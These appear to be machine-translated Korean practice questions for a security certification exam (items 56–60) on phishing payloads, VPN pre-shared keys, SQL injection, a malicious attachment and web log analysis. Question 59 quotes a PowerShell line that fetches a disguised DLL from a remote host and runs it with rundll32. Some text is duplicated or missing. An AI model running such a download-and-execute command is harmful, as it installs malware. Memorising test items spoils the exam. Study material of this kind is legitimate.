SY0-601-KR 문제 56
사용자의 자격 증명에 대한 피싱 사기 이후 레드 팀은 서버에 배포할 페이로드를 만들 수 있었습니다. 이 공격으로 인해 새로운 원격 세션을 시작하는 악성 소프트웨어의 설치가 허용되었습니다. 다음 중 발생한 공격 유형은 무엇입니까?
SY0-601-KR 문제 57
보안 관리자는 외부 파트너를 위해 내부 네트워크에 대한 보안 액세스를 제공해야 합니다. 관리자는 타사 보안 관리자에게 PSK 및 기타 매개변수를 제공했습니다. 다음 중 이 연결을 설정하는 데 사용되는 것은 무엇입니까?
SY0-601-KR 문제 58
보안 엔지니어가 회사 웹사이트가 웹 애플리케이션 공격에 취약하다는 침투 테스트 보고서를 조사하고 있습니다. 테스트 시점부터 웹 로그를 확인하는 동안 엔지니어는 "SELECT * FROM customername"과 같은 비정상적인 주소를 사용하여 몇 가지 잘못된 웹 양식 제출을 발견했습니다. 다음 중 시도할 가능성이 가장 높은 것은?
SY0-601-KR 문제 59
한 직원이 Updates라는 특이한 파일이 첨부된 이메일을 받았습니다. 링크 보안 분석가는 다음 스크립트를 실행하는 파일이 수행하고 찾은 것을 리버스 엔지니어링합니다.
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;시작 프로세스 rundll32.exe $env:TEMP \autoupdate.dll 다음 중 분석가가 발견한 내용을 가장 잘 설명하는 것은 무엇입니까?
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;시작 프로세스 rundll32.exe $env:TEMP \autoupdate.dll 다음 중 분석가가 발견한 내용을 가장 잘 설명하는 것은 무엇입니까?
SY0-601-KR 문제 60
하급 보안 분석가가 웹 서버 로그를 검토하고 로그 파일에서 다음 패턴을 식별합니다.
다음 중 어떤 유형의 공격이 시도되고 있으며 이를 완화할 수 있는 방법은 무엇입니까?
다음 중 어떤 유형의 공격이 시도되고 있으며 이를 완화할 수 있는 방법은 무엇입니까?